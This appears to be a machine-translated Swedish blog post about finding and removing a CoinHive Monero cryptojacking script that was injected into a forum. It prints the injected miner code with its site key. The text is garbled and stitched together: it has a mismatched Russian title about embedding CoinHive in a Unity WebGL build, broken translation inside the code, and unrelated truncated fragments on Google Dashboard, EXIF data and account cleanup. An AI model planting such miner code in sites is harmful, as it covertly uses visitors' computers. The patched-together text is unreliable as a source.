Unity3D Итеграция сервиса CoinHive Monero в WebGL билд
Innehållsförteckning:
Jag har läst om webbplatsägare som använder skript på sina webbplatser som använder CPU för besökarens dator när de besöker deras hemsida. Tanken är att tjäna pengar på innehållet - och i stället för att använda annonser använder de ett skript som körs i webbläsaren och använder användarens datortillgångar till min cryptocurrency. Men jag brukade tro att endast webbägare gjorde det genom design - jag trodde aldrig att hackare skulle hacka webbplatser och driva manuset på andra webbplatser och använda sina besökare CPU för att tjäna pengar för sig själva. Men det här verkar hända nu!
Coinhive Crypto-mining script
I går när jag besökte vårt TWC Forum, som körs på vBulletin-programvaran, tog min säkerhetsprogram upp denna varning:
// coinhive dot com /lib/coinhive.js Objektfil upptäckt, nedladdning blockerad
Jag brukar besöka forumet varje dag och jag hade inte sett den dagen innan. Så jag antar att detta hade hänt någon gång under natten, min tid när jag sov.
Jag använder vBulletin-programvaran för forumet, och den uppdaterades till den senaste versionen. Dessutom var detta ganska förvånande för oss, eftersom TheWindowsClub.com-domänen använder Sucuri Web Antivirus & Firewall för att skydda sig från onlinebaserade hot och attacker.
Min dator säkerhetsprogram stoppade framgångsrikt det skadliga manuskriptet från att köra på min Windows 10-dator. Jag kollade med andra webbläsare som Chrome & Edge, och resultaten var desamma.
Efter att ha högerklickat på forumets webbsida och kollade källkoden fann jag att det var ett CryptoMiner skadligt skript av CoinHive.
Detta är den skadliga Coinhive Javascript som kom in i mitt forum kod:
var miner = ny CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();
Hur som helst gjorde jag det första jag tog forumet och informera Sucuri.
Sucuri-folket rengjorde forumet för Coinhive-manuset som hade kommit till mitt forum om några timmar, och allt var bra.
Vad är CoinHive
Coinhive-erbjudanden en JavaScript-gruvarbetare för Monero Cryptocurrency som du kan bädda in på din webbplats och använda CPU för webbplatsens besökardatorer till mina mynt för dig.
Detta kallas Cryptojacking . Det handlar om att kapa användarnas webbläsare för cryptocurrency mining. Vissa webbplatsägare kan använda sig själva för att tjäna pengar - men i vårt fall hade det injicerats.
När en användare åtkomst till den infekterade webbplatsen kör Coinhive JavaScript och minorna Monero använder användarens CPU-resurser. Detta kan leda till att CPU-spjällning och oväntad systemkrasch av offrets maskin blir skadad.
Om din webbläsare är infekterad ser du ditt resursutnyttjande gå upp. Stäng webbläsaren, och den kommer att släppa. Användaren kan märka att hans maskin är uppvärmd, fläkten går fort eller batteriet dränerar snabbt.
Jag frågade min kollega Saurabh Mukhekar att besöka mitt forum med hjälp av hans Mac och se vad som hände. Tja, hans Mac-dator blev också påverkad när han öppnade forumet med Safari! Han är en av de smarta Mac OSX-användare som använder ett antivirusprogram för sin Mac. Hans Avast-antivirus för Mac stoppade framgångsrikt det skadliga manuskriptet från att köra.
Saurabur,
CoinHive malware kapar inte bara en Windows-dator utan även Mac-datorn, eftersom det är webbaserat Javascript-infektion. Det är bra Jag tror inte på myten att Mac-datorer inte behöver ett antivirusprogram, annars skulle min maskin ha blivit smittade och min Mac skulle fortsätta att sätta ut mynt för någon annan.
Förhindra att CoinHive infekterar din webbplats
- Använd inga NULL-mallar eller plugins på din webbplats / forum.
- Håll ditt CMS uppdaterat till den senaste versionen.
- Uppdatera din värdprogramvara regelbundet (PHP, Databas, etc …).
- Säkra din webbplats med webbsäkerhetsleverantörer som Sucuri, Cloudflare, Wordfence, etc.
- Ta grundläggande försiktighetsåtgärder för att säkra din blogg.
CoinHive miniräknare bort från webbplatsen
Först och främst måste du vara webbansvarig för infekterad webbplats - eller har administrativa uppgifter som ger dig tillgång till alla webbplatsfiler.
När ditt antivirus upptäcker CoinHive-infektionen högerklickar du på webbsidan och väljer Visa källkod. Tryck sedan på Ctrl + F och sök efter "CoinHive".
När du har identifierat platsen för den skadliga koden måste du se sin position - var ligger den. Nu måste du ta bort det manuellt. För att göra detta behöver du lite kodning av din plattform. Du måste hitta den infekterade filen / s och manuellt ta bort ovanstående skript från det. Om du inte är säker på det, fråga någon expert att göra det. Eftersom vi använder Sucuri låter vi dem göra det.
Har du gjort det, raderar du servern och webbläsarens cache. Om du använder något cacheplugin eller säg MaxCDN, raderar du också dessa caches.
Skydda dig mot krypteringsskript
Cryptocurrencies & Blockchain-teknik tar över världen. Det skapar en inverkan på den globala ekonomin och orsakar tekniskt störningar också. Alla har börjat fokusera på en sådan lukrativ marknad - och det inkluderar även hackare på webbplatsen. När avkastningen ökar, bör vi förvänta sig att sådan teknik kommer att missbrukas. Det är den mörka sidan av någon ny teknik.
Det vi kan göra är att alltid vidta de bästa möjliga försiktighetsåtgärderna. Förutom att du använder en bra säkerhetsprogramvara, använd en Chrome- eller Firefox-förlängning som blockerar webbplatser från att använda din CPU till min Cryptocurrency - eller använd fortfarande Anti-WebMiner som stoppar Cryptojacking Mining Script-attacker genom att ändra din värdfil. Det fungerar på alla webbläsare. Om du är en Mac-användare får du även ett antivirusprogram för din dator.
Om du känner att du kanske har besökt en infekterad webbplats, är det en bra idé att rensa din webbläsare cache och skanna din maskin med ditt antivirusprogram och AdwCleaner.
Håll dig säker, var försiktig!
Dashboard-sidan, tillgänglig på google.com/dashboard, ger dig en översikt över kalendrar eller dokument du delar, din chatt historia och webbplatser du har behörighet att få åtkomst till dina Picasa-bilder eller Gmail-kontakter (till exempel en socialt nätverkande webbplats som kan använda din kontaktlista för att hjälpa dig att hitta andra användare, à la Facebook). Du hittar också en lista med sökfrågor du har utfört när du är inloggad på Google. Om du använder Google Verktygsfält och har akti
En ren sökschema
När du tar ett digitalt foto tar du mer än bara fotot. Du tar också upp en rad personligt identifierbara uppgifter som kan äventyra din integritet om det någonsin föll i fela händer. Den informationen heter EXIF-metadata och många inser inte ens att dessa data är inbäddade i sina bilder. Den goda nyheten är dock att den lätt kan tas bort med ett program som ExifCleaner ($ 19, 30-dagars gratis provversion).
Vilken typ av information talar vi om? Tja det kan sträcka sig från det vardagliga som till exempel kamerans märke och modell som tog bilden, bildupplösningen, ljuskällan och så vidare. Men det kan också vara så allvarligt som där du tog bilden och vilket datum du tog det, och den här informationen kan bevaras när du skickar ett foto online. Så vem som helst som vill spåra dig vet vart du är i världen, och den som vill knyta dig till en viss plats vid en viss tid behöver bara titta på EXIF-data.
Avgiftning är viktigt, vare sig det är din kropp eller dina digitala konton. Medvetet eller inte skapar vi ofta så många konton på olika webbplatser, lämnar våra referenser där och glömmer. Vi kommer knappast ihåg de mindre viktiga konton som vi har gjort över internet eller de villkor som vi har kommit överens om genom att klicka på "Jag håller med om". Medan den moderna livsstilen har gjort det nästan omöjligt för oss att koppla bort från internet, finns det vissa sätt som ger oss st
Data Detox